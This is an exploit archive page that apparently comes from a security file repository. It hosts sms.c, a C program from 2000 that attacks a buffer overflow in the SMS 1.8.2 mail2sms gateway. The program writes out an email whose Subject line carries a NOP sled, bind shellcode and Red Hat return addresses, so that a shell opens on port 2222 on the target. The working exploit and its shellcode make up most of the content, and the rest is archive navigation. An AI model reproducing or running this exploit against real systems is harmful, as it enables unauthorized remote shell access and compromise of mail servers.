sms.c

sms.c: Posted May 31, 2000; Authored by Venglin | Site b0f.freebsd.lublin.pl; sms.c is a remote SMS 1.8.2 (mail2sms gateway) long subject line remote buffer overflow exploit. Send the mail generated by this program and a shell will be listening on port 2222. Offsets adjusted for redhat.; tags | exploit, remote, overflow, shell; systems | linux, redhat; SHA-256 | 5263a1384cd6d126f626841f9e172551ca855196cc1ef2d42713cc721e51647b; Download | Favorite | View

sms.c

/*
 * sms, wersja: 1.8.2,
 * Wysylanie wiadomosci na telefony sieci Era, Plus GSM i Idea Centertel.
 *
 * *REMOTE EXPLOIT*
 *
 * (c) 2000 babcia padlina / buffer0verfl0w security (b0f.freebsd.lublin.pl)
 *
 * Send mail generated by program. After successfull exploiting, telnet
 * to port 2222.
 *
 * Sometimes adjusting parameter BUFSIZE may be useful. It depends on
 * procmail script configuration.
*/

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define NOP             0x90
#define OFS             0
#define BUFSIZE         914
#define ADDRS           8
#define RET             0xbffff970 /* most redhat boxes */

char shell[] = /* duke bind shellcode */
"\xeb\x10\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xc3\x31\xc0\xb0\x01\xcd"
"\x80\xc3\xe8\xeb\xff\xff\xff\xb0\x06\xcd\x80\xb0\x06\xfe\xc3\xcd"
"\x80\xb0\x06\xfe\xc3\xcd\x80\xb0\x02\xcd\x80\x39\xc1\x75\xdc\xe8"
"\xce\xff\xff\xff\xb0\x02\xb1\x01\xb2\x06\x52\x51\x50\xb3\x01\xb0"
"\x66\x89\xe1\xcd\x80\x89\xc6\xe8\xb6\xff\xff\xff\x83\xc4\x12\x50"
"\xb9\x02\xff\x08\xae\x30\xed\x51\x89\xe2\x83\xec\x06\xb0\x10\x50"
"\xb3\x02\x52\x56\xb0\x66\x89\xe1\xcd\x80\xb0\x10\x50\x56\xb0\x66"
"\xb3\x04\x89\xe1\xcd\x80\xe8\x87\xff\xff\xff\x50\x50\x56\xb0\x66"
"\xb3\x05\x89\xe1\xcd\x80\x31\xc9\x88\xc3\xb0\x29\xcd\x80\xb0\x3f"
"\xcd\x80\xeb\x16\x5e\x88\x4e\x07\x89\x76\x08\x89\x4e\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe5\xff\xff\xff"
"/bin/sh";

int main(argc, argv)
int argc;
char **argv;
{
        char *buf, *p;
        int noplen, i, ofs;
        long ret, *ap;

        if(!(buf = (char *)malloc(BUFSIZE+ADDRS+10)))
        {
                perror("malloc()");
                return -1;
        }

        if (argc > 1)
                ofs = atoi(argv[1]);
        else
                ofs = OFS;

        ret = RET + ofs;

        noplen = BUFSIZE - strlen(shell);

        memset(buf, NOP, noplen);
        buf[noplen+1] = '\0';
        strcat(buf, shell);

        p = buf + noplen + strlen(shell);
        ap = (unsigned long *)p;

        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;

        p = (char *)ap;
        *p = '\0';

        fprintf(stderr, "RET: 0x%x  len: %d\n\n", ret, strlen(buf));

        printf("Return-Path: @\n");
        printf("Subject: %s\n\n", buf);

        return 0;
}

Top Authors In Last 30 Days

Red Hat 223 files
Ubuntu 61 files
Debian 20 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,160)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,842)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,249)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,975)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

sms.c

sms.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

sms.c

Share This

sms.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems